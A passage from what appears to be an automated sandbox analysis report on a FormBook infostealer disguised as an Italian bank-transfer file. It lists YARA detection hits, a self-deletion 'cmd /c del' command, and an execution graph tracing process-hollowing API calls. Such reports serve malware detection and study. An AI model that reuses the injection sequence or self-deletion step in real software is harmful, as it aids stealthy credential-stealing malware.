                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:7
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff611de0000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:10:14:15
                                Start date:21/06/2024
                                Path:C:\Windows\SysWOW64\control.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\control.exe"
                                Imagebase:0x220000
                                File size:149'504 bytes
                                MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:9
                                Start time:10:14:18
                                Start date:21/06/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0xc30000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:10:14:18
                                Start date:21/06/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff68cce0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:9.9%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:2.1%
                                  Total number of Nodes:195
                                  Total number of Limit Nodes:10
                                  execution_graph 29871 c9c788 29872 c9c79c 29871->29872 29873 c9c7c1 29872->29873 29875 c9bf18 29872->29875 29876 c9c968 LoadLibraryExW 29875->29876 29878 c9c9e1 29876->29878 29878->29873 30096 c94668 30097 c9467a 30096->30097 30098 c94686 30097->30098 30100 c94779 30097->30100 30101 c94782 30100->30101 30102 c947a7 30100->30102 30105 c94888 30101->30105 30109 c94877 30101->30109 30102->30098 30107 c948af 30105->30107 30106 c9498c 30106->30106 30107->30106 30113 c94248 30107->30113 30111 c94888 30109->30111 30110 c9498c 30110->30110 30111->30110 30112 c94248 CreateActCtxA 30111->30112 30112->30110 30114 c95d18 CreateActCtxA 30113->30114 30116 c95ddb 30114->30116 30116->30116 29879 73b7b38 29880 73b7cc3 29879->29880 29882 73b7b5e 29879->29882 29882->29880 29883 73b7600 29882->29883 29884 73b7db8 PostMessageW 29883->29884 29885 73b7e24 29884->29885 29885->29882 29896 73b5823 29897 73b5829 29896->29897 29898 73b5837 29897->29898 29902 73b63b8 29897->29902 29919 73b6416 29897->29919 29937 73b63a8 29897->29937 29903 73b63d2 29902->29903 29911 73b63f6 29903->29911 29954 73b67da 29903->29954 29958 73b7166 29903->29958 29963 73b68e7 29903->29963 29969 73b6bc0 29903->29969 29974 73b68a2 29903->29974 29983 73b6b6d 29903->29983 29988 73b6b0e 29903->29988 29993 73b6b28 29903->29993 29998 73b6df5 29903->29998 30003 73b7015 29903->30003 30008 73b6a70 29903->30008 30012 73b68ff 29903->30012 30019 73b69ff 29903->30019 30023 73b6a38 29903->30023 29911->29898 29920 73b63a4 29919->29920 29921 73b6419 29919->29921 29922 73b67da 2 API calls 29920->29922 29923 73b6a38 2 API calls 29920->29923 29924 73b69ff 2 API calls 29920->29924 29925 73b68ff 4 API calls 29920->29925 29926 73b6a70 2 API calls 29920->29926 29927 73b7015 2 API calls 29920->29927 29928 73b6df5 2 API calls 29920->29928 29929 73b63f6 29920->29929 29930 73b6b28 2 API calls 29920->29930 29931 73b6b0e 2 API calls 29920->29931 29932 73b6b6d 2 API calls 29920->29932 29933 73b68a2 4 API calls 29920->29933 29934 73b6bc0 2 API calls 29920->29934 29935 73b68e7 2 API calls 29920->29935 29936 73b7166 2 API calls 29920->29936 29921->29898 29922->29929 29923->29929 29924->29929 29925->29929 29926->29929 29927->29929 29928->29929 29929->29898 29930->29929 29931->29929 29932->29929 29933->29929 29934->29929 29935->29929 29936->29929 29938 73b63d2 29937->29938 29939 73b67da 2 API calls 29938->29939 29940 73b6a38 2 API calls 29938->29940 29941 73b69ff 2 API calls 29938->29941 29942 73b68ff 4 API calls 29938->29942 29943 73b6a70 2 API calls 29938->29943 29944 73b7015 2 API calls 29938->29944 29945 73b6df5 2 API calls 29938->29945 29946 73b63f6 29938->29946 29947 73b6b28 2 API calls 29938->29947 29948 73b6b0e 2 API calls 29938->29948 29949 73b6b6d 2 API calls 29938->29949 29950 73b68a2 4 API calls 29938->29950 29951 73b6bc0 2 API calls 29938->29951 29952 73b68e7 2 API calls 29938->29952 29953 73b7166 2 API calls 29938->29953 29939->29946 29940->29946 29941->29946 29942->29946 29943->29946 29944->29946 29945->29946 29946->29898 29947->29946 29948->29946 29949->29946 29950->29946 29951->29946 29952->29946 29953->29946 30028 73b5018 29954->30028 30032 73b500c 29954->30032 29959 73b716c 29958->29959 29960 73b718f 29959->29960 30036 73b4e79 29959->30036 30040 73b4e80 29959->30040 29964 73b68f0 29963->29964 29966 73b6862 29964->29966 30044 73b4d90 29964->30044 30048 73b4d88 29964->30048 29965 73b7054 29966->29911 29970 73b6be3 29969->29970 29972 73b4d88 WriteProcessMemory 29970->29972 29973 73b4d90 WriteProcessMemory 29970->29973 29971 73b6c28 29972->29971 29973->29971 29975 73b6ab3 29974->29975 30052 73b7ae8 29975->30052 30058 73b7aa1 29975->30058 30063 73b7ab0 29975->30063 29976 73b6acc 29977 73b6862 29976->29977 30068 73b4b48 29976->30068 30072 73b4b41 29976->30072 29977->29911 29984 73b6a4f 29983->29984 29986 73b4e79 ReadProcessMemory 29984->29986 29987 73b4e80 ReadProcessMemory 29984->29987 29985 73b718f 29986->29985 29987->29985 29989 73b6b14 29988->29989 29991 73b4d88 WriteProcessMemory 29989->29991 29992 73b4d90 WriteProcessMemory 29989->29992 29990 73b7054 29991->29990 29992->29990 29994 73b6b35 29993->29994 29995 73b6862 29994->29995 29996 73b4b48 ResumeThread 29994->29996 29997 73b4b41 ResumeThread 29994->29997 29995->29911 29996->29994 29997->29994 29999 73b6dfb 29998->29999 30000 73b6862 29999->30000 30001 73b4b48 ResumeThread 29999->30001 30002 73b4b41 ResumeThread 29999->30002 30000->29911 30001->29999 30002->29999 30004 73b701b 30003->30004 30006 73b4d88 WriteProcessMemory 30004->30006 30007 73b4d90 WriteProcessMemory 30004->30007 30005 73b7054 30006->30005 30007->30005 30010 73b4d88 WriteProcessMemory 30008->30010 30011 73b4d90 WriteProcessMemory 30008->30011 30009 73b6a94 30009->29911 30010->30009 30011->30009 30084 73b4cd0 30012->30084 30088 73b4cc8 30012->30088 30013 73b691d 30017 73b4d88 WriteProcessMemory 30013->30017 30018 73b4d90 WriteProcessMemory 30013->30018 30014 73b7054 30017->30014 30018->30014 30021 73b4bf8 Wow64SetThreadContext 30019->30021 30022 73b4bf0 Wow64SetThreadContext 30019->30022 30020 73b6a19 30021->30020 30022->30020 30024 73b6a3e 30023->30024 30026 73b4e79 ReadProcessMemory 30024->30026 30027 73b4e80 ReadProcessMemory 30024->30027 30025 73b718f 30026->30025 30027->30025 30029 73b50a1 30028->30029 30029->30029 30030 73b5206 CreateProcessA 30029->30030 30031 73b5263 30030->30031 30033 73b5018 30032->30033 30033->30033 30034 73b5206 CreateProcessA 30033->30034 30035 73b5263 30034->30035 30037 73b4ecb ReadProcessMemory 30036->30037 30039 73b4f0f 30037->30039 30039->29960 30041 73b4ecb ReadProcessMemory 30040->30041 30043 73b4f0f 30041->30043 30043->29960 30045 73b4dd8 WriteProcessMemory 30044->30045 30047 73b4e2f 30045->30047 30047->29965 30049 73b4dd8 WriteProcessMemory 30048->30049 30051 73b4e2f 30049->30051 30051->29965 30053 73b7ab4 30052->30053 30055 73b7af7 30053->30055 30076 73b4bf8 30053->30076 30080 73b4bf0 30053->30080 30054 73b7adb 30054->29976 30055->29976 30059 73b7ac5 30058->30059 30061 73b4bf8 Wow64SetThreadContext 30059->30061 30062 73b4bf0 Wow64SetThreadContext 30059->30062 30060 73b7adb 30060->29976 30061->30060 30062->30060 30064 73b7ac5 30063->30064 30066 73b4bf8 Wow64SetThreadContext 30064->30066 30067 73b4bf0 Wow64SetThreadContext 30064->30067 30065 73b7adb 30065->29976 30066->30065 30067->30065 30069 73b4b88 ResumeThread 30068->30069 30071 73b4bb9 30069->30071 30071->29976 30073 73b4b48 ResumeThread 30072->30073 30075 73b4bb9 30073->30075 30075->29976 30077 73b4c3d Wow64SetThreadContext 30076->30077 30079 73b4c85 30077->30079 30079->30054 30081 73b4bf8 Wow64SetThreadContext 30080->30081 30083 73b4c85 30081->30083 30083->30054 30085 73b4d10 VirtualAllocEx 30084->30085 30087 73b4d4d 30085->30087 30087->30013 30089 73b4cd0 VirtualAllocEx 30088->30089 30091 73b4d4d 30089->30091 30091->30013 30121 6c04938 30123 6c04965 30121->30123 30122 6c04ed1 30123->30122 30124 73b7ae8 2 API calls 30123->30124 30124->30122 29886 c9e780 29887 c9e7c6 29886->29887 29890 c9e960 29887->29890 29893 c9e298 29890->29893 29894 c9e9c8 DuplicateHandle 29893->29894 29895 c9e8b3 29894->29895 30117 c9c6e0 30118 c9c728 GetModuleHandleW 30117->30118 30119 c9c722 30117->30119 30120 c9c755 30118->30120 30119->30118

                                  Executed Functions

                                  Function 06C04938 Relevance: 6.7, Strings: 5, Instructions: 477COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 374 6c04938-6c04963 375 6c04965 374->375 376 6c0496a-6c049fd call 6c05160 call 6c051a2 374->376 375->376 381 6c049fe 376->381 382 6c04a05-6c04a21 381->382 383 6c04a23 382->383 384 6c04a2a-6c04a2b 382->384 383->381 385 6c04ca0-6c04cbb 383->385 386 6c04b41-6c04b55 383->386 387 6c04bc4-6c04bc8 383->387 388 6c04d47-6c04d5a 383->388 389 6c04aea-6c04b09 383->389 390 6c04d2a-6c04d45 383->390 391 6c04a8b 383->391 392 6c04b0b-6c04b2e 383->392 393 6c04a2d-6c04a5d 383->393 394 6c04b91-6c04b9e call 6c05688 383->394 395 6c04c71 383->395 396 6c04ad2-6c04ae8 383->396 397 6c04cd2 383->397 398 6c04b33-6c04b3c 383->398 399 6c04a74-6c04a8a 383->399 400 6c04c55-6c04c6f 383->400 401 6c04b5a-6c04b5e 383->401 402 6c04bfb-6c04c0a 383->402 403 6c04cfb 383->403 404 6c04d5c 383->404 405 6c04abd-6c04ad0 383->405 406 6c04cbd-6c04cd0 383->406 407 6c04a5f-6c04a72 383->407 384->393 384->399 411 6c04c78-6c04c94 385->411 413 6c04a92-6c04aae 386->413 408 6c04bca-6c04bd9 387->408 409 6c04bdb-6c04be2 387->409 412 6c04d02-6c04d1e 388->412 389->413 390->412 391->413 392->413 393->382 416 6c04ba4-6c04bbf 394->416 395->411 396->413 397->403 398->413 399->391 400->395 400->397 414 6c04b60-6c04b6f 401->414 415 6c04b71-6c04b78 401->415 482 6c04c10 call 6c057d0 402->482 483 6c04c10 call 6c05778 402->483 403->412 431 6c04d77 404->431 405->413 406->411 407->382 418 6c04be9-6c04bf6 408->418 409->418 421 6c04c96 411->421 422 6c04c9d-6c04c9e 411->422 424 6c04d20 412->424 425 6c04d27-6c04d28 412->425 427 6c04ab0 413->427 428 6c04ab7-6c04ab8 413->428 417 6c04b7f-6c04b8c 414->417 415->417 416->413 417->413 418->413 421->385 421->388 421->390 421->395 421->397 421->403 421->404 421->406 432 6c04ee8-6c04f3d call 6c078a8 421->432 433 6c04ec9 421->433 434 6c0504c-6c05086 call 6c087f8 call 6c0a088 call 6c0ac50 421->434 435 6c04db2 421->435 436 6c04e13-6c04e7b call 6c078a8 421->436 437 6c04dde 421->437 422->385 422->397 424->388 424->390 424->403 424->404 424->431 424->432 424->433 424->434 424->435 424->436 424->437 438 6c04eb1-6c04ec4 424->438 439 6c050b2-6c050b9 424->439 440 6c04f9a-6c05002 424->440 441 6c04dfb-6c04e0e 424->441 425->390 425->404 427->385 427->386 427->387 427->388 427->389 427->390 427->391 427->392 427->394 427->395 427->396 427->397 427->398 427->400 427->401 427->402 427->403 427->404 427->405 427->406 428->400 428->405 442 6c04d7e-6c04d9a 431->442 464 6c04f43-6c04f50 432->464 489 6c04ecb call 73b7af8 433->489 490 6c04ecb call 73b7ae8 433->490 460 6c0508c-6c050ad 434->460 492 6c04db5 call 6c057d0 435->492 493 6c04db5 call 6c05778 435->493 472 6c04e81-6c04eac 436->472 486 6c04de1 call 6c0ba00 437->486 487 6c04de1 call 6c0b8c8 437->487 438->442 465 6c05004-6c05010 440->465 466 6c0502c 440->466 441->442 444 6c04dac-6c04dad 442->444 445 6c04d9c 442->445 443 6c04c16-6c04c50 443->413 444->435 444->439 445->431 445->432 445->433 445->434 445->435 445->436 445->437 445->438 445->439 445->440 445->441 446 6c04de7-6c04df9 446->442 450 6c04ed1-6c04ee3 452 6c04dbb-6c04ddc 452->442 467 6c04f52-6c04f5e 464->467 468 6c04f7a 464->468 470 6c05012-6c05018 465->470 471 6c0501a-6c05020 465->471 469 6c05032-6c05047 466->469 473 6c04f60-6c04f66 467->473 474 6c04f68-6c04f6e 467->474 475 6c04f80-6c04f95 468->475 469->442 476 6c0502a 470->476 471->476 472->442 477 6c04f78 473->477 474->477 475->442 476->469 477->475 482->443 483->443 486->446 487->446 489->450 490->450 492->452 493->452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p$$p$$p
                                  • API String ID: 0-1202566845
                                  • Opcode ID: d7f449480b625bde52c20a2f9b543bdf879301b4dbf99059a86f6cca88d5dafa
                                  • Instruction ID: 9177f37abceffa0ed967dd90742e5c7a68bcc36278a8b2f90b51fb6bac18108e
                                  • Opcode Fuzzy Hash: d7f449480b625bde52c20a2f9b543bdf879301b4dbf99059a86f6cca88d5dafa
                                  • Instruction Fuzzy Hash: D1221874E05218DFEB58CFA5D99479EBBF2FB89300F10D4AAD509AB294DB309941CF14
                                  Function 06C04928 Relevance: 4.2, Strings: 3, Instructions: 461COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 503 6c04928-6c04963 505 6c04965 503->505 506 6c0496a-6c049bc call 6c05160 call 6c051a2 503->506 505->506 508 6c049c2-6c049fd 506->508 511 6c049fe 508->511 512 6c04a05-6c04a21 511->512 513 6c04a23 512->513 514 6c04a2a-6c04a2b 512->514 513->511 515 6c04ca0-6c04cbb 513->515 516 6c04b41-6c04b55 513->516 517 6c04bc4-6c04bc8 513->517 518 6c04d47-6c04d5a 513->518 519 6c04aea-6c04b09 513->519 520 6c04d2a-6c04d45 513->520 521 6c04a8b 513->521 522 6c04b0b-6c04b2e 513->522 523 6c04a2d-6c04a5d 513->523 524 6c04b91-6c04b9e call 6c05688 513->524 525 6c04c71 513->525 526 6c04ad2-6c04ae8 513->526 527 6c04cd2 513->527 528 6c04b33-6c04b3c 513->528 529 6c04a74-6c04a8a 513->529 530 6c04c55-6c04c6f 513->530 531 6c04b5a-6c04b5e 513->531 532 6c04bfb 513->532 533 6c04cfb 513->533 534 6c04d5c 513->534 535 6c04abd-6c04ad0 513->535 536 6c04cbd-6c04cd0 513->536 537 6c04a5f-6c04a72 513->537 514->523 514->529 541 6c04c78-6c04c94 515->541 543 6c04a92-6c04aae 516->543 538 6c04bca-6c04bd9 517->538 539 6c04bdb-6c04be2 517->539 542 6c04d02-6c04d1e 518->542 519->543 520->542 521->543 522->543 523->512 546 6c04ba4-6c04bbf 524->546 525->541 526->543 527->533 528->543 529->521 530->525 530->527 544 6c04b60-6c04b6f 531->544 545 6c04b71-6c04b78 531->545 549 6c04c04-6c04c0a 532->549 533->542 561 6c04d77 534->561 535->543 536->541 537->512 548 6c04be9-6c04bf6 538->548 539->548 551 6c04c96 541->551 552 6c04c9d-6c04c9e 541->552 554 6c04d20 542->554 555 6c04d27-6c04d28 542->555 557 6c04ab0 543->557 558 6c04ab7-6c04ab8 543->558 547 6c04b7f-6c04b8c 544->547 545->547 546->543 547->543 548->543 612 6c04c10 call 6c057d0 549->612 613 6c04c10 call 6c05778 549->613 551->515 551->518 551->520 551->525 551->527 551->533 551->534 551->536 562 6c04ee8-6c04f24 551->562 563 6c04ec9 551->563 564 6c0504c-6c05086 call 6c087f8 call 6c0a088 call 6c0ac50 551->564 565 6c04db2 551->565 566 6c04e13-6c04e5f 551->566 567 6c04dde 551->567 552->515 552->527 554->518 554->520 554->533 554->534 554->561 554->562 554->563 554->564 554->565 554->566 554->567 568 6c04eb1-6c04ec4 554->568 569 6c050b2-6c050b9 554->569 570 6c04f9a-6c05002 554->570 571 6c04dfb-6c04e0e 554->571 555->520 555->534 557->515 557->516 557->517 557->518 557->519 557->520 557->521 557->522 557->524 557->525 557->526 557->527 557->528 557->530 557->531 557->532 557->533 557->534 557->535 557->536 558->530 558->535 572 6c04d7e-6c04d9a 561->572 591 6c04f2b-6c04f3d call 6c078a8 562->591 619 6c04ecb call 73b7af8 563->619 620 6c04ecb call 73b7ae8 563->620 590 6c0508c-6c050ad 564->590 622 6c04db5 call 6c057d0 565->622 623 6c04db5 call 6c05778 565->623 593 6c04e69-6c04e7b call 6c078a8 566->593 616 6c04de1 call 6c0ba00 567->616 617 6c04de1 call 6c0b8c8 567->617 568->572 595 6c05004-6c05010 570->595 596 6c0502c 570->596 571->572 574 6c04dac-6c04dad 572->574 575 6c04d9c 572->575 573 6c04c16-6c04c50 573->543 574->565 574->569 575->561 575->562 575->563 575->564 575->565 575->566 575->567 575->568 575->569 575->570 575->571 576 6c04de7-6c04df9 576->572 580 6c04ed1-6c04ee3 582 6c04dbb-6c04ddc 582->572 594 6c04f43-6c04f50 591->594 602 6c04e81-6c04eac 593->602 597 6c04f52-6c04f5e 594->597 598 6c04f7a 594->598 600 6c05012-6c05018 595->600 601 6c0501a-6c05020 595->601 599 6c05032-6c05047 596->599 603 6c04f60-6c04f66 597->603 604 6c04f68-6c04f6e 597->604 605 6c04f80-6c04f95 598->605 599->572 606 6c0502a 600->606 601->606 602->572 607 6c04f78 603->607 604->607 605->572 606->599 607->605 612->573 613->573 616->576 617->576 619->580 620->580 622->582 623->582
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: 52f1b1eabc56fbf7d24fed510a7739b4ba7fe25d0b82279a351f0b2afe43c2eb
                                  • Instruction ID: 28efc63d8f34839a9a0a7060d3b462ae2fc2980f117f9843c2bb1908f0348f42
                                  • Opcode Fuzzy Hash: 52f1b1eabc56fbf7d24fed510a7739b4ba7fe25d0b82279a351f0b2afe43c2eb
                                  • Instruction Fuzzy Hash: 3D121874E05218DFEB58CFA5D99479EBBF2BB89300F10D4AAD509B7254EB309A41CF14
                                  Function 06C04CEC Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 625 6c04cec-6c04cf3 626 6c04cd5-6c04cea 625->626 627 6c04cf5-6c04cf9 625->627 626->627 628 6c04cfb 627->628 629 6c04d5c 627->629 631 6c04d02-6c04d1e 628->631 634 6c04d77 629->634 632 6c04d20 631->632 633 6c04d27-6c04d28 631->633 632->628 632->629 632->634 635 6c04d47-6c04d5a 632->635 636 6c04ee8-6c04f24 632->636 637 6c04ec9 632->637 638 6c04d2a-6c04d45 632->638 639 6c0504c-6c05086 call 6c087f8 call 6c0a088 call 6c0ac50 632->639 640 6c04eb1-6c04ec4 632->640 641 6c04db2 632->641 642 6c050b2-6c050b9 632->642 643 6c04e13-6c04e5f 632->643 644 6c04f9a-6c05002 632->644 645 6c04dfb-6c04e0e 632->645 646 6c04dde 632->646 633->629 633->638 647 6c04d7e-6c04d9a 634->647 635->631 665 6c04f2b-6c04f3d call 6c078a8 636->665 686 6c04ecb call 73b7af8 637->686 687 6c04ecb call 73b7ae8 637->687 638->631 662 6c0508c-6c050ad 639->662 640->647 690 6c04db5 call 6c057d0 641->690 691 6c04db5 call 6c05778 641->691 667 6c04e69-6c04e7b call 6c078a8 643->667 669 6c05004-6c05010 644->669 670 6c0502c 644->670 645->647 683 6c04de1 call 6c0ba00 646->683 684 6c04de1 call 6c0b8c8 646->684 648 6c04dac-6c04dad 647->648 649 6c04d9c 647->649 648->641 648->642 649->634 649->636 649->637 649->639 649->640 649->641 649->642 649->643 649->644 649->645 649->646 651 6c04de7-6c04df9 651->647 653 6c04ed1-6c04ee3 657 6c04dbb-6c04ddc 657->647 668 6c04f43-6c04f50 665->668 676 6c04e81-6c04eac 667->676 671 6c04f52-6c04f5e 668->671 672 6c04f7a 668->672 674 6c05012-6c05018 669->674 675 6c0501a-6c05020 669->675 673 6c05032-6c05047 670->673 677 6c04f60-6c04f66 671->677 678 6c04f68-6c04f6e 671->678 679 6c04f80-6c04f95 672->679 673->647 680 6c0502a 674->680 675->680 676->647 681 6c04f78 677->681 678->681 679->647 680->673 681->679 683->651 684->651 686->653 687->653 690->657 691->657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: e2e82d02acaa3c9afb871e0a53a30d6b8349d1f8e4f1847d80f21e4e03be6e8e
                                  • Instruction ID: c793a1d5004e44f8be015f5d6bc6b2b1f782295c57a865a5c46545a257a67eaa
                                  • Opcode Fuzzy Hash: e2e82d02acaa3c9afb871e0a53a30d6b8349d1f8e4f1847d80f21e4e03be6e8e
                                  • Instruction Fuzzy Hash: B7A1E774E05318DFEB58CFA5D99479EBBB2FB89310F1080AAD509AB354DB309A81CF54
                                  Function 06C04CD7 Relevance: 4.0, Strings: 3, Instructions: 217COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 694 6c04cd7-6c04cf9 696 6c04cfb 694->696 697 6c04d5c 694->697 698 6c04d02-6c04d1e 696->698 701 6c04d77 697->701 699 6c04d20 698->699 700 6c04d27-6c04d28 698->700 699->696 699->697 699->701 702 6c04d47-6c04d5a 699->702 703 6c04ee8-6c04f24 699->703 704 6c04ec9 699->704 705 6c04d2a-6c04d45 699->705 706 6c0504c-6c05086 call 6c087f8 call 6c0a088 call 6c0ac50 699->706 707 6c04eb1-6c04ec4 699->707 708 6c04db2 699->708 709 6c050b2-6c050b9 699->709 710 6c04e13-6c04e5f 699->710 711 6c04f9a-6c05002 699->711 712 6c04dfb-6c04e0e 699->712 713 6c04dde 699->713 700->697 700->705 714 6c04d7e-6c04d9a 701->714 702->698 732 6c04f2b-6c04f3d call 6c078a8 703->732 757 6c04ecb call 73b7af8 704->757 758 6c04ecb call 73b7ae8 704->758 705->698 729 6c0508c-6c050ad 706->729 707->714 750 6c04db5 call 6c057d0 708->750 751 6c04db5 call 6c05778 708->751 734 6c04e69-6c04e7b call 6c078a8 710->734 736 6c05004-6c05010 711->736 737 6c0502c 711->737 712->714 754 6c04de1 call 6c0ba00 713->754 755 6c04de1 call 6c0b8c8 713->755 715 6c04dac-6c04dad 714->715 716 6c04d9c 714->716 715->708 715->709 716->701 716->703 716->704 716->706 716->707 716->708 716->709 716->710 716->711 716->712 716->713 718 6c04de7-6c04df9 718->714 720 6c04ed1-6c04ee3 724 6c04dbb-6c04ddc 724->714 735 6c04f43-6c04f50 732->735 743 6c04e81-6c04eac 734->743 738 6c04f52-6c04f5e 735->738 739 6c04f7a 735->739 741 6c05012-6c05018 736->741 742 6c0501a-6c05020 736->742 740 6c05032-6c05047 737->740 744 6c04f60-6c04f66 738->744 745 6c04f68-6c04f6e 738->745 746 6c04f80-6c04f95 739->746 740->714 747 6c0502a 741->747 742->747 743->714 748 6c04f78 744->748 745->748 746->714 747->740 748->746 750->724 751->724 754->718 755->718 757->720 758->720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: 5b0370a5c1f392a0b5e0c0e2070f4e78d76c1b821a7d6761f5540feac048fe84
                                  • Instruction ID: ba2f6ec5589efc1e608b79d3c49098f2dece97113f5d4022931a9068fad2d07f
                                  • Opcode Fuzzy Hash: 5b0370a5c1f392a0b5e0c0e2070f4e78d76c1b821a7d6761f5540feac048fe84
